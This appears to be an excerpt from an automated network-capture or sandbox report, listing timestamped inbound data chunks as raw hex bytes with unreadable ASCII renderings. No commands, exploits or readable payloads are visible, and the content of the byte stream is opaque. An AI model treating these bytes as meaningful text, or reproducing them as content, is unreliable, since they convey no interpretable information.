2023-09-07 07:31:08 UTC	90	IN	Data Raw: 5e c0 16 67 f6 05 6e 9e 7f 52 f2 36 2f e6 c7 44 ee 21 fb 61 e8 14 d3 ac aa ab 12 ac a2 2a 37 5f fc 2a 8a e9 93 c5 6d e0 25 44 0b a8 a3 5c bf 8f 33 e4 34 91 f3 c2 37 db de f6 c0 5a 2a 56 10 92 e4 39 d4 c5 44 33 6b 33 33 bb ee d8 f7 82 dc eb 2a 8f ae 0d bd 3b 6d 12 b0 2a 8e c0 62 f7 7b 8a 09 74 dd 23 cd d5 dc ec 8c 5e f4 cd ac 67 10 3b 10 21 8a 82 e5 c2 da 93 61 ef fd 4a 92 4b 7b ac 68 1b 4a 87 80 e3 a7 9a 6d 1c fb 5a 0a ae 71 5b 68 48 59 46 d7 11 28 15 f5 d2 04 64 c1 30 8d 6d 09 25 ae 58 b3 46 05 4d 7f f6 28 4b 0d ce 8c 12 f6 8e 8c e2 8a a2 1f 2d cf fb 0d f0 63 f8 76 09 ff aa ca 88 e5 5a 88 1d 13 81 39 49 6e cb 0f 49 61 fe d8 e0 a5 cd 74 53 7b c9 e6 58 ce aa 58 b6 73 a5 ea 58 34 d0 dc 5d a5 e8 6e f4 ad d5 42 09 38 98 d3 5d be ec f4 04 d4 2b 4f 15 4b 5f cf Data Ascii: ^gnR6/D!a7_m%D\347ZV9D3k33;m*b{t#^g;!aJK{hJmZq[hHYF(d0m%XFM(K-cvZ9InIatS{XXsX4]nB8]+OK_
2023-09-07 07:31:08 UTC	91	IN	Data Raw: 64 f5 c8 ff 8b e8 3b cf 43 27 9d a3 b9 7a 82 2e ed dc b1 11 fa 7d 84 4d ab a6 53 34 7e af 29 df f5 9c 0e f1 49 99 3d 54 5b a2 ff b4 4a e7 6b 0e f4 68 57 f6 e9 56 14 76 c7 5b 20 f2 1b 4c 03 66 a0 11 e3 76 81 e5 ab 46 c7 e6 87 03 aa 03 38 69 37 ca 17 f2 63 31 b1 5b a8 25 a4 a0 51 7b 95 2d ea 21 d6 c2 e8 aa 1f f1 ed ee 59 21 62 45 86 36 eb 54 ee 83 c1 0f b2 5d d8 18 8e 58 3b 55 aa 07 81 b7 ac 53 9e d6 2e b7 47 d5 a1 cc 17 82 c4 79 9a 11 78 cb a9 c4 47 57 66 2e a8 cc 91 a7 27 24 ad 55 1b 0e da 18 a2 41 a0 81 22 b4 95 42 79 c4 13 bd 54 54 c1 c5 37 39 32 06 53 31 74 f8 51 61 3d cc 3e 40 01 00 f6 55 61 85 e9 70 68 4f 2f 3e bd 13 18 e7 04 ca 53 ea 1f cf bb 8a c3 3f 3d a7 17 96 32 16 ae 57 ec 9b 7a db 90 60 03 f7 79 17 11 59 71 97 9c f8 eb 16 f7 cb f9 2e 63 b9 0a Data Ascii: d;C'z.}MS4~)I=T[JkhWVv[ LfvF8i7c1[%Q{-!Y!bE6T]X;US.GyxGWf.'$UA"ByTT792S1tQa=>@UaphO/>S?=2Wz`yYq.c
2023-09-07 07:31:08 UTC	93	IN	Data Raw: f9 d1 f3 de fb 1e 8c bf 28 57 bc d3 6d f9 a5 ef 34 f8 94 d8 2e df 6a 35 2f d7 5e 77 5e 34 1f af b1 96 84 3a 4b 0d ec a7 aa eb d5 d3 6d d2 86 90 fc 89 6c 09 25 e1 68 d7 1a 89 d6 5c ae 27 1e 94 0f a0 45 62 64 14 76 f8 73 78 2b ff fc 4d 2b 32 84 1d 61 22 e6 9e 0d 19 cc 1d 98 90 67 f5 11 89 6b fd 8f 41 5a 8b ec 57 aa ba 4b a7 3d c7 8a 82 30 a7 b8 5d 95 33 18 3b 98 b3 cf 96 88 60 c1 98 a2 de f5 de e8 a6 b6 28 72 a2 2b 88 16 7c 6d 75 7e 5d 45 6c cd a3 75 7f d2 f5 02 79 0b dc b3 fe 9c bb 5a 89 5a 7e 97 76 5e b1 0d b1 f3 7e d5 9c f6 f8 cd fa 37 2f c7 0a 5d c6 4b 5a 37 73 51 6f f3 77 50 31 f3 e8 3b 5b 36 de 25 a7 0b 58 84 f0 9d c6 bd 17 d1 c0 98 00 1d 54 c5 bc 25 1c f5 ad 38 a1 9e bc 00 0a 98 26 48 4a 93 0a 83 02 39 31 8a fb a5 c7 5a b2 d4 20 08 51 a6 6d a5 1a aa Data Ascii: (Wm4.j5/^w^4:Kml%h\'Ebdvsx+M+2a"gkAZWK=0]3;`(r+\|mu~]EluyZZ~v^~7/]KZ7sQowP1;[6%XT%8&HJ91Z Qm
2023-09-07 07:31:08 UTC	94	IN	Data Raw: 73 13 3b 3b 98 f7 e4 ef fb ef 3b 49 bf c4 51 0d 65 07 6d d6 37 4d 40 17 95 c6 45 95 d2 19 ba 94 0b 68 84 27 21 42 41 0f 55 14 0a 54 b1 a4 32 14 d7 37 d8 ad d8 be 21 99 ca ae c7 01 13 9a 12 6f 64 17 f8 f9 e1 ae 15 14 67 b6 3a 9c 59 b4 13 09 0b 56 9c d5 53 5e bc 14 06 2a 1a 83 4a 35 79 90 1e 97 97 67 09 37 80 d9 c5 e6 ae 21 53 0d dd 9b 0a 91 9e 81 31 6a 20 22 b3 29 37 34 fe 7c 56 82 6f 19 7b 6c 23 73 09 21 65 42 24 78 cb 6f dc 09 f1 53 2e 5f c7 80 51 56 e9 d8 00 4e 3b 19 a5 d0 53 12 61 f8 1d 10 64 e8 57 a1 59 29 d0 c6 d5 a5 84 27 1f 5e 18 db 4c a4 d9 55 bc c3 aa b8 50 50 01 47 30 5b 22 af 7c 38 40 00 0a 10 82 31 76 7f 68 1c f0 d3 88 96 f9 7a e1 fb f4 28 98 1b 89 cf 41 fa 56 40 ba bd a1 73 20 a1 6e fc f1 79 af 0c 04 50 18 9d 4f 7e d0 58 a2 ac 8a 97 d1 e5 87 Data Ascii: s;;;IQem7M@Eh'!BAUT27!odg:YVS^*J5yg7!S1j ")74\|Vo{l#s!eB$xoS._QVN;SadWY)'^LUPPG0["\|8@1vhz(AV@s nyPO~X
2023-09-07 07:31:08 UTC	95	IN	Data Raw: fd f2 72 a7 d4 f5 f6 87 c4 46 1e d5 a9 fc 5f d0 ee df ec 59 ec e6 ee 07 7b 86 25 83 64 0c bf d4 cd bd 03 82 84 de 16 da 6c 92 a5 10 9c 9a ab 13 0f c8 a8 84 c3 91 ea 49 75 b2 41 29 ee 89 6a 58 84 47 02 51 88 3d f6 19 67 30 87 ee 5c 74 0a 37 6b 98 ba 64 66 71 65 e5 52 cf cb 6f 2f 08 54 63 d0 ae 28 e7 75 41 89 31 7f 8d a2 7c 83 3c b5 5e a9 53 54 e4 f2 b7 84 d6 7c 82 2d 18 0e 96 8e c2 99 f1 00 77 73 1d f6 61 5d a3 1d f1 cb ed 36 c5 48 9c be 04 22 4b de ec 33 06 4d 7e b3 d3 b6 18 db 45 01 16 cf 34 d0 bc 96 fc a0 a1 d0 7b aa de ac 67 b0 c6 4c fc 02 e8 d2 8b 0c 4e 33 92 eb 46 ea d7 e3 18 60 19 6d f2 d5 ed 8b aa 90 7e 0e 12 60 7f 00 27 18 6d d0 87 bd 8b 96 1e 6c e6 d5 5f 1e 2e df db 01 d5 45 93 d4 40 df 08 92 5b 8b ef a5 97 c8 ab 61 45 bc af eb d1 f5 8b 30 0f 68 Data Ascii: rF_Y{%dlIuA)jXGQ=g0\t7kdfqeRo/Tc(uA1\|<^ST\|-wsa]6H"K3M~E4{gLN3F`m~`'ml_.E@[aE0h
2023-09-07 07:31:08 UTC	96	IN	Data Raw: b7 fe bb 7c c9 8a 4d 40 11 72 3b 11 68 69 89 aa e6 c7 d4 b0 d2 43 1a ff ba 26 01 e6 c8 95 96 ce b6 98 c8 20 70 56 34 9a a9 f8 b9 b5 40 8f 48 61 34 7d 65 4f bc 35 58 8b b8 10 a8 59 6c a6 2c aa 08 3c 35 37 7b f4 72 c2 4a 7b 41 37 82 ba 85 7a db 59 5e a1 2c 92 64 85 89 f2 bd 7e f9 46 11 f0 32 55 e8 91 11 b2 37 6a 93 8a 6d 61 ed 1c 67 6e d5 d7 0c 86 e4 3a 6d 9c 3e 48 e4 2e d2 cf c0 4e ea 03 4d 68 fb 1a de a2 a1 af e0 ad 9f 2a 28 f1 eb 69 42 ec 85 c8 70 a0 59 4c 0a b9 ad 4a 5f 9d 13 f7 05 e0 ba dd 6c f2 90 fb c5 74 3a 91 11 98 d4 56 36 29 bf 2c 71 24 25 45 fe f8 e8 7f da f5 d8 b4 b3 ad 57 70 41 66 4c 2b a4 b7 4a e2 68 84 73 7c ca 30 c6 3a d1 df 99 8b f0 d9 bf 89 ea d7 30 3e 92 9a d9 c0 cb a2 7d 11 fc 67 95 4c 7c 88 3c 2d 4a 8b 86 e4 55 84 5b e1 fa 61 0b bf 7d Data Ascii: \|M@r;hiC& pV4@Ha4}eO5XYl,<57{rJ{A7zY^,d~F2U7jmagn:m>H.NMh*(iBpYLJ_lt:V6),q$%EWpAfL+Jhs\|0:0>}gL\|<-JU[a}
2023-09-07 07:31:08 UTC	97	IN	Data Raw: 6d ac 76 03 41 4d 4c d9 04 e7 3e b2 c8 13 6d a1 fb e0 bc 0b 7d b0 7c da f5 ab 94 9b 52 0f 4a ae f4 db 61 51 e2 dd 22 88 e0 da 12 7b 4e f1 ae a8 b5 de f1 3f 81 28 e1 ed df 51 19 52 91 15 73 2d e0 42 0a de f4 c9 18 16 bb 4c fa aa 44 21 9c a6 4d e2 8e cd 5f 11 20 1f 7e 3c b3 56 84 93 e0 0d ed e3 92 e0 49 bb c5 ff a7 fa 6a 2b Data Ascii: mvAML>m}\|RJaQ"{N?(QRs-BLD!M_ ~<VIj+
2023-09-07 07:31:08 UTC	98	IN	Data Raw: a6 9a 69 ca 5e e3 c3 7d 9a fb 28 6f 52 34 93 be 4a 50 92 3b e6 b0 7e 11 d6 74 ab 4d bb fe 71 e9 5f af 23 c6 f9 9b 0f e2 53 81 d2 46 68 a5 07 b7 4e ce 69 75 cf 50 26 f2 ee 49 07 23 ef 61 34 0c 10 73 04 79 bd 0f f0 7f 89 08 b2 94 c4 e1 96 08 48 8f 04 32 1f a2 03 da b3 43 99 53 88 2f df b9 42 40 89 3c f9 39 00 3d c5 b5 1b a2 d9 ef 59 2f 45 73 77 f4 82 7e 8c 8b e1 09 92 57 d8 47 92 ad 28 42 7c d1 8d a8 af 4c 9f d4 17 7c 59 c6 55 ed 05 25 2c 32 b7 5b 5e c9 af ea 4e 45 79 30 a5 b5 b9 ab 34 3b a5 8d c4 21 e9 c4 d9 5a a1 81 26 b2 9a 5e 21 ec 20 fd 54 09 4b cc 2b 37 21 15 52 33 57 ed af eb 11 c8 3e 56 12 13 e7 52 78 a2 8b 8e 69 63 2d 13 a3 d5 c0 36 f6 37 14 f6 1f cf bb a2 f4 01 2d a5 3d 9e 32 1a aa a7 e4 9a 7b a6 b1 53 59 eb 58 12 3f 67 8f 96 ba e6 c4 a7 8f dc 5c Data Ascii: i^}(oR4JP;~tMq_#SFhNiuP&I#a4syH2CS/B@<9=Y/Esw~WG(B\|L\|YU%,2[^NEy04;!Z&^! TK+7!R3W>VRxic-67-=2{SYX?g\
2023-09-07 07:31:08 UTC	99	IN	Data Raw: 38 7f f9 e9 cd fb f4 d6 f0 03 95 be 08 1b 12 2e c9 d0 eb f9 36 ae 80 84 2f df 64 6c 5b d1 7e 12 cd 22 45 87 d3 8c 97 3b 6b 80 bd a9 f1 c2 9b d8 45 ea eb e6 f6 85 7a 10 fc ef 5f f0 6d de 3d 3f 53 45 1c 94 0e d4 9f 63 62 34 5e f4 61 78 2d f2 fa 3b 14 7e e3 17 7c 25 cd a2 1e 04 d4 5f 9a 0f 6d e6 15 2f 7a f9 f1 16 4b 8d cd 6c 83 a9 1d a0 c7 ce c9 9e 32 b0 ad 77 88 2b 0f 28 1d 89 e2 94 a7 6a fb 74 a7 e6 f5 de e6 bd 92 2c 9d 49 71 a4 1b 6c 6f 73 0b 8a 56 6a ef ea 70 10 2a d9 b9 ad 09 c6 9d 15 8a 8b 71 e6 8c 10 83 7c 4d be fa 9b b2 14 ac 4e f7 fe ce 98 28 42 34 0d 5f 9c 10 fc 9c 99 0f 6f 98 75 50 3d 9b 1e 6a 20 12 b0 d0 a2 23 11 e9 e5 97 c4 b5 4d bb eb f6 ee 19 56 9f ea d9 c3 f9 b8 15 9d 9b ad 03 34 52 2f 6e 56 5c 09 4d 6b e7 3e ac 05 1d 6a 98 ef fc 42 00 7d a6 Data Ascii: 8.6/dl[~"E;kEz_m=?SEcb4^ax-;~\|%_m/zKl2w+(jt,IqlosVjp*q\|MN(B4_ouP=j #MV4R/nV\Mk>jB}
2023-09-07 07:31:08 UTC	100	IN	Data Raw: c6 13 e6 47 f0 6c 14 12 f0 f1 e4 f2 fe fa 54 69 b0 db 51 f1 1f 04 6e fd 36 7c 27 80 bb 11 10 91 c4 05 df 85 66 59 8c 31 3d 33 33 22 54 1e 08 33 35 cf e3 36 4d 39 c9 a1 e2 a1 5f ae a7 ba cd 03 62 69 60 64 62 01 da ae e4 a9 0e 05 6e dd 1a 9b 36 b2 13 72 2e 46 9b c7 2f 19 f5 14 06 2a 1d 9c 36 0c a5 9c 05 92 c0 4f 19 30 eb db ed a2 a6 fd 48 13 ef f5 27 93 9e 89 33 0e 0e 3b 84 2c 1b 34 7f 7c 56 a8 2b 51 7a 7d 50 6a 6a 10 67 42 2e 61 80 46 dd 9c f7 51 2d 8d f8 81 40 44 d2 f5 29 1b 3d 20 03 c8 ad 19 5b e9 75 27 15 e6 5f a3 28 0a cb d5 dc a2 83 2d 89 c9 76 c6 40 da c8 57 c7 e8 d8 b7 56 59 1d 45 a7 21 40 9e 6f 35 5d fc 70 13 8d 4f 6f 77 7e 10 0d b5 e5 a7 f1 70 f3 c2 f9 3b b9 14 9f 04 40 d6 52 41 ad ae bd 65 3b 87 59 02 f6 42 53 26 2a 7c b2 80 23 3e e3 42 a8 a6 f2 Data Ascii: GlTiQn6\|'fY1=33"T356M9_bi`dbn6r.F/6O0H'3;,4\|V+Qz}PjjgB.aFQ-@D)= [u'_(-v@WVYE!@o5]pOow~p;@RAe;YBS&\|#>B
2023-09-07 07:31:08 UTC	101	IN	Data Raw: 9b ef 4e ce be db 5b a5 f5 6c f4 f4 a9 28 63 f8 98 ff 5b 96 95 e4 ed f4 e8 f8 bf b4 77 ad 18 81 17 38 40 d5 e5 93 9f a2 e3 85 07 10 6d f2 a7 1a a3 03 83 1d 0d cb d5 b1 db 9d ee 42 19 71 41 05 e2 c4 1f 5a 84 4d 0b 5f f9 06 ff 0f 9d 33 d0 c2 5d 63 02 26 67 ee 49 67 4a 79 4c 9c 56 0f cc 41 3e 0c 3b 3e e2 aa 22 8f 64 44 e6 92 7d 8d b9 68 8d 13 b4 7c a2 44 ac cf c2 a0 97 dc 75 88 37 ef 17 44 81 ea f2 cc 09 6e 74 27 44 89 5c 5d 2a e1 cc fa 2a c2 58 7b 41 29 1e 4b 8e c1 19 d3 4b 08 9b c6 98 11 d1 6a 1a 12 bb 13 c3 bb 8a 08 a7 8e c2 53 ac cf ab 61 aa c6 52 7f 2d c5 d0 a4 d7 6f 6c 6a 38 b1 ef c3 f1 18 60 17 53 fb e2 c2 83 f2 ff 54 0c 13 66 6b 1a 39 68 41 e9 86 ab 9d 68 1f 40 ca d5 6a 45 2e c0 ab ff d4 68 82 cf 40 f4 54 9d 5a a3 04 a7 97 d3 a5 36 72 14 87 a3 d3 f5 Data Ascii: N[l(c[w8@mBqAZM_3]c&gIgJyLVA>;>"dD}h\|Du7Dnt'D\]**X{A)KKjSaR-olj8`STfk9hAh@jE.h@TZ6r
2023-09-07 07:31:08 UTC	102	IN	Data Raw: 92 37 6b 87 a8 ed b3 69 b6 b5 4d 46 e0 60 12 17 52 8a 8b 4e f4 e7 de a8 c9 1c 71 01 bb 0a 15 e4 c6 82 df d8 a2 97 2b 32 50 58 20 ed 89 ea 47 b0 79 c4 79 03 3a 68 70 5b b8 0c e4 96 46 1b ac 51 6f a0 3e d2 d2 54 22 92 59 85 74 df 5f 56 53 24 87 a3 b7 9b ce 66 5d a2 3b 81 71 d2 5f c0 93 79 fa 59 06 fa 31 43 e4 80 05 a1 3e 86 6c a7 4d 62 e3 0c 36 33 b0 3b f7 86 e0 3a 64 9c 3e 41 ec de 2d e2 e5 46 60 42 fe 47 db 08 c0 b8 ae ad e9 b2 9c d8 34 23 e6 4c 53 e2 d3 e1 98 07 c9 5f 18 aa a2 40 50 8b 06 09 15 c0 a0 d3 98 e9 af f1 c0 4d 5c 8e 09 6c ef 6f d0 d3 43 35 65 23 71 6d 61 f5 f0 8b f3 89 c9 94 b7 74 f8 2b 69 00 51 32 b1 c1 62 f1 6d 91 04 9b d8 10 d2 2e de c6 91 79 a9 dd 39 99 ef ce 47 1c 8b 89 d1 df d4 bd 64 ef ec 4e 8d 40 94 bb 4e 39 51 98 9e c2 c3 84 4d 0c fe Data Ascii: 7kiMF`RNq+2PX Gyy:hp[FQo>T"Yt_VS$f];q_yY1C>lMb63;:d>A-F`BG4#LS_@PM\loC5e#qmat+iQ2bm.y9GdN@N9QM
2023-09-07 07:31:08 UTC	104	IN	Data Raw: 89 9b bc 03 b1 01 39 48 40 4e 71 a1 07 e7 3a ae a0 2f 6c b0 ec ed 45 1c 3e 9c 7c a1 ce 8c 96 e4 7a 26 f8 ab f6 aa 5c 4d f1 ca 34 88 f5 ac 69 a2 4e dd b4 9c a5 8d eb 3c 81 26 ca f8 c8 3e 25 4f 84 0c 46 3a e2 5a c8 bd 0a c8 34 05 df 4d ea a3 18 5f bd fc 5c e3 c0 b4 6f 72 cd f3 92 e2 a1 63 45 83 08 26 da e5 9c 9b 69 b6 dc 05 a1 c9 78 71 f5 86 6a ca 50 e6 a2 74 e4 d4 39 6f 49 01 8e ce 9b 50 be 2a 97 b4 4e 10 dc 7a aa 3d f9 a4 59 51 55 a8 09 85 b4 87 07 ca 61 7f 3c aa 61 86 e3 a5 6e db 7a 02 e8 af 27 da ed 56 1a 68 cb 52 27 00 01 9e 01 4a b5 37 e6 47 53 e6 55 95 d4 c6 af 69 74 2b ee 68 37 c0 01 e4 b5 30 b1 f3 89 25 a5 40 50 53 89 2e ea 27 fe 3d e9 aa 18 ca d8 ec 59 12 42 6d 2f dd b1 7c 9d 97 cb 22 a8 57 de 0f 7a 52 05 5d 80 c7 ef 9c a4 5f 8a cc 0c 6f 40 cd 55 Data Ascii: 9H@Nq:/lE>\|z&\M4iN<&>%OF:Z4M_\orcE&ixqjPt9oIP*Nz=YQUa<anz'VhR'J7GSUit+h70%@PS.'=YBm/\|"WzR]_o@U
2023-09-07 07:31:08 UTC	105	IN	Data Raw: ca 5e 40 a5 b9 52 72 1d a4 07 0c f0 55 a7 2d 1e 77 b1 9d 52 1d 3e 5b 8e a1 f3 99 89 ee 9c e7 f1 3a 73 05 19 01 3e 5a a4 cd 6d e9 f3 08 26 a5 79 a4 3e 62 49 4b 1d 23 e7 0a b8 89 ca f6 ab eb 22 2b 4a 3e 38 c9 34 4c 61 0e 26 41 96 af ba 3b 2e b4 39 83 f1 43 a0 36 6b 6a 90 1b b8 41 2e 92 81 67 f0 ef 39 7f 2c 03 c9 34 2b ab 0b ce 91 43 09 37 ad f1 ed f1 d2 f1 e4 41 e6 79 46 0e 65 00 39 37 db ed fe 04 fb fb 22 2c df 60 dc 34 d1 6f 05 e4 d9 7d fd d1 94 84 3c 7a 96 a4 4c 0e ef a7 d7 02 e1 eb e6 fa 81 5d dd fb ef 4e e8 78 33 3b 06 97 42 03 98 f7 ab b7 72 64 37 05 4a 62 78 21 90 cb 56 2b 7a fc 10 7c 24 e6 8f 0b 18 02 1e b4 04 65 e3 39 9e 6a fd 94 5c 52 9e c0 41 bb ac 52 a7 3d c7 8a 93 32 a1 af 73 83 22 1e 07 4e a5 e3 94 88 9c e1 70 dc c5 e3 cd e5 ac 87 50 c4 5f 8f Data Ascii: ^@RrU-wR>[:s>Zm&y>bIK#"+J>84La&A;.9C6kjA.g9,4+C7AyFe97",`4o}<zL]Nx3;Brd7Jbx!V+z\|$e9j\RAR=2s"NpP_
2023-09-07 07:31:08 UTC	106	IN	Data Raw: 4a c4 bc 0b 59 43 80 e4 43 f5 bd e9 34 8a 43 a1 81 48 90 7d 7f 6e c0 ea d1 f1 94 bf e7 97 e9 b1 af ae d3 24 ce ef 5a ce 0b 1f ce e3 60 e2 b8 99 51 bc e4 33 bf b1 44 6e f2 64 8f da 8e 1a a7 4a 87 90 2b 0e 7e a8 29 c0 9a 57 8c ba d5 29 01 53 ff 6c 00 28 0b 86 2f 09 c0 7a c7 53 33 e6 77 42 cd b9 83 78 22 27 53 92 0b ff 77 d7 11 4e 3c 7e 4a 04 e2 40 7f 09 cd 55 08 f3 e4 f2 c2 e0 40 37 b3 db 5f 80 d7 2a 6f f7 be 66 a9 e9 6b 13 56 e8 ab 0e c9 99 23 68 8e 22 07 34 48 aa 55 1e 0c ba bb a6 23 08 02 03 50 ab f4 b9 30 98 bf 44 c6 2d 14 44 1a 0b 67 17 f6 d3 6a a9 04 13 6d b9 2b 9e 2e 46 10 25 17 45 b3 81 3b 31 b7 3e 42 22 0b 8e 4f 3b b1 84 27 b0 ba 60 12 29 e4 cd c2 ff 5a fc 6e 13 f5 b2 55 93 9e 85 19 31 23 3a 8e 3e 3d 2c e6 54 76 81 6f 59 60 7c 46 75 1e df 64 6e 3c Data Ascii: JYCC4CH}n$Z`Q3DndJ+~)W)Sl(/zS3wBx"'SwN<~J@U@7_*ofkV#h"4HU#P0D-Dgjm+.F%E;1>B"O;'`)ZnU1#:>=,TvoY`\|Fudn<
2023-09-07 07:31:08 UTC	107	IN	Data Raw: 28 a2 9f d5 c0 f1 a6 49 f7 fd 4b b9 63 7d ba 62 1b 54 98 8d e6 5e 9b 50 18 e1 b3 01 82 7c 4e 80 61 c7 45 fc 19 08 e5 e4 fd 03 75 c6 25 af 85 0a 29 12 f7 48 18 3c 2a 0e b7 2c 63 0d a1 b3 1a de 92 93 ed 9f 83 c1 3f ee 3a 06 24 62 d4 52 0e c7 5b ca 88 ef 4a e7 18 2a 81 30 5f e3 dc 0e 52 50 e5 de 97 a3 a2 c8 c8 7b c3 98 03 df ae 75 bf 7f a7 e9 4e db d6 e9 a7 a4 d3 5d d0 c2 62 ac 44 ee fb fd 5f 93 ec 51 85 78 cd e6 ff 10 5f ac 19 83 66 67 1c d7 e1 a3 7f b8 f0 82 03 6e 43 ef ae ee 9b a0 aa 3d d9 6f 44 d5 f2 ff e8 41 64 4b cc 39 e6 fa 60 58 0a 24 16 10 08 1c fe 0f 98 19 f5 ef 5c 69 75 6a 61 81 4e 1f 55 79 5d e0 79 1f cb 5b d1 09 78 6a e2 24 41 94 7c 18 e3 97 11 b1 af 95 71 e8 83 57 b3 43 aa f4 d9 ab 6e dd 48 82 2f 9f 7f 77 86 d2 bb 1a f4 91 67 0e f8 77 b2 a5 2d Data Ascii: (IKc}bT^P\|NaEu%)H<,c?:$bR[J0_RP{uN]bD_Qx_fgnC=oDAdK9`X$\iujaNUy]y[xj$A\|qWCnH/wgw-
2023-09-07 07:31:08 UTC	109	IN	Data Raw: 76 94 92 c5 09 8b 53 c0 e6 85 7f 20 56 0c b9 9e 98 64 46 9f d0 06 7e 42 ce 55 ed 05 20 2c ad db 19 7d a5 80 83 41 44 62 24 a7 a2 a6 b1 d9 25 87 63 c3 62 a2 c4 a2 6d a9 ee 44 b7 85 48 66 c8 00 fb 54 12 5c d9 ca 39 1e 20 72 c2 e4 11 0b c2 5f ce 3e 47 06 8c db 43 6b bc 9c fe 01 c3 0e 38 a6 ec 31 95 0b c8 36 8f 42 cd b1 83 89 0e 2c 89 0b 8d 36 0f b5 57 ec 9b 68 da 8e 7a 4f ef 73 3c 3f 54 8f 96 9b 0b c0 d4 a1 c1 51 15 05 bb 1b 0f ea 3d 83 e2 ce bf 9d fd 25 7c 56 0e be a1 eb 47 9f 92 a1 4a 62 3b 6a 67 5e a9 19 fe 80 46 1b ac 54 6e 8e 1a 88 fa 61 2d 8d 58 85 74 c2 5d 57 4a cb 83 90 83 45 6f ea b8 fb 15 fc 79 8a 71 f1 1f 10 7c 74 19 ef 23 6e e5 90 00 b4 5b 25 6f 8b 4b 10 e6 07 72 67 5e c0 17 90 09 28 4d 95 17 ff 05 df d3 d1 e6 56 ea 2b f5 6c ed ee d2 91 aa bc fb Data Ascii: vS VdF~BU ,}ADb$%cbmDHfT\9 r_>GCk816B,6WhzOs<?TQ=%\|VGJb;jg^FTna-Xt]WJEoyq\|t#n[%oKrg^(MV+l
2023-09-07 07:31:08 UTC	110	IN	Data Raw: d1 f3 51 88 31 14 2c 77 b8 fc 8c 5d 63 c6 69 db dd 7a b7 f5 cf 19 48 db 48 70 85 33 78 77 2b 47 7e 25 be 95 b7 6b 03 2a f4 13 79 18 c7 65 ea b0 b3 79 f1 ce 73 88 68 5e be 26 88 e8 64 ab b2 f6 d4 d3 f0 2f 47 bb 14 5d cc 6a f7 da 9e 03 d6 f0 a7 02 28 8e 0f 30 5b 2d bb cf aa f5 53 c7 ef 9a 48 de 0a 99 c9 e8 e3 0e 5e cf 80 e0 dd e0 42 3c a1 8f 85 21 65 8c 2c 4f 2f 6a 0c 90 0c cf 57 ae db 0a 7e b4 f7 e6 51 00 51 b1 74 b6 3a ab b8 93 55 25 e7 b0 97 c7 93 4f fc d6 31 93 f3 d4 0c 9a 41 23 bf 96 ae ce 30 c0 7e dd c4 f0 cd 5b 19 5c 8e 10 9e 2c dd 55 15 db 19 c2 34 16 ae 7d f0 5d 1d 1c 94 d5 59 d1 6f 23 ad f1 22 08 47 3c a2 58 37 2b e6 df 79 be ae d3 05 84 cf 99 a7 38 6c 95 e9 28 68 2d e6 e3 6d d2 f2 06 74 60 02 32 61 ce a0 dd 5b 65 a2 c6 8e 9e 28 a6 4b 75 de a0 d2 Data Ascii: Q1,w]cizHHp3xw+G~%k*yeysh^&d/G]j(0[-SH^B<!e,O/jW~QQt:U%O1A#0~[\,U4}]Yo#"G<X7+y8l(h-mt`2a[e(Ku
2023-09-07 07:31:08 UTC	111	IN	Data Raw: 88 8e 90 35 6a 11 6c c3 6e 7c 72 b8 3b 10 c4 36 4a 67 62 55 43 53 7e 23 1a 6b 2c b7 69 d8 ca be 11 6e f8 91 cd 02 00 e2 ca 0a 4d 76 4e f0 8f ea 45 6f cb 4c 13 16 ff 47 b9 4c 04 94 83 9e fd d6 73 10 ba 03 e8 4e c3 f9 50 bc c7 d9 69 4c 3a 4d f7 84 fa 90 17 68 35 57 fe f9 b3 b4 5c fc fe f6 8b 17 d9 8a 96 f3 ce 5a 99 9e f3 44 c4 40 e9 45 d6 52 40 49 ab aa 69 b0 3b fc 87 72 50 ad 27 06 81 6b 61 21 8e 49 cc 39 3a f1 8e d1 e5 e5 0f 0d 48 78 0c ed 07 12 52 a2 a2 35 d1 80 ac 34 b3 74 a4 36 7d c7 bc 45 53 54 1d b3 96 c0 65 4f 7a 1b 8f b0 3f 14 c1 c5 9e 9a d9 75 e2 26 1e b9 33 36 4a 60 38 4d 20 cd 7e 36 6d 90 1d d7 d0 fa 0b c3 a7 19 0c db 92 31 fd c8 18 69 24 be e5 b9 79 79 0f 73 c2 ae de d1 d4 f0 ef 18 86 b9 58 d7 49 6b 0e f2 b9 ca 05 dd eb 98 0b eb 51 24 0b f5 00 Data Ascii: 5jln\|r;6JgbUCS~#k,inMvNEoLGLsNPiL:Mh5W\ZD@ER@Ii;rP'ka!I9:HxR54t6}ESTeOz?u&36J`8M ~6m1i$yysXIkQ$
2023-09-07 07:31:08 UTC	112	IN	Data Raw: 2d be bd 9c a5 84 84 2c 99 29 11 16 68 58 4a e2 ec e2 cb c1 f6 f9 77 a3 a2 ec f8 49 b6 95 76 f5 3f f2 b4 09 49 f5 ee fc e6 2e 62 31 47 18 ba 09 cf ad 25 bc 13 d2 6e 84 2c e6 45 51 b3 2f 3b 48 8b 2d 21 ad 65 cd 16 35 1f 42 bd c0 00 56 a8 0a 47 29 ff 84 f1 86 1e 30 26 67 3e 1c c0 ec 01 66 6b 0b f7 14 88 ff 3b 01 3c 00 e6 d1 63 78 c6 f2 a5 3e 17 ae 62 f8 36 55 cd fb bf 92 5b 3d 58 8a cb 5a 3e 99 f8 e7 5d 65 5f 7b 0d a8 71 f2 6b 20 d5 58 63 a3 5e 97 f8 55 85 e9 65 45 4d 6d 37 11 d0 35 7e c7 3a aa 5e 46 e4 65 be b8 89 60 c7 22 d9 90 6a 6b 1a d1 7c 6c e8 24 e2 cd ac 5c 0e be de 0f 6e 54 02 05 59 67 af 17 d4 6a 16 e6 73 58 fc 08 0a 52 56 2f 64 b2 54 ff 36 d9 31 61 1f 45 f3 3c be 1a 5f 31 9a 15 e8 de d0 d5 c5 cd 61 6c 9b 86 71 d8 38 06 43 d5 11 75 a9 e9 74 40 ff Data Ascii: -,)hXJwIv?I.b1G%n,EQ/;H-!e5BVG)0&g>fk;<cx>b6U[=XZ>]e_{qk Xc^UeEMm75~:^Fe`"jk\|l$\nTYgjsXRV/dT61aE<_1alq8Cut@
2023-09-07 07:31:08 UTC	113	IN	Data Raw: 3e f0 2f 40 8b 95 28 9c ff 49 99 8f 71 5d c0 50 94 46 db 47 96 d2 bd ae bc be fc 29 32 45 0e ea 45 4c 0b 09 96 0b 39 21 40 0b b9 0d 54 46 ca e9 2e d2 27 66 09 56 3c 72 3b 18 b5 af 4f dd 57 37 86 11 1f 83 d4 8c 20 29 45 ef 27 c1 0d 9a 56 6b 2b 0f b3 1a 97 df b3 f8 8a 32 4b c5 55 d4 2e b5 c4 69 86 58 a4 ca c0 8e 75 dc 6d 8d Data Ascii: >/@(Iq]PFG)2EEL9!@TF.'fV<r;OW7 )E'Vk+2KU.iXum
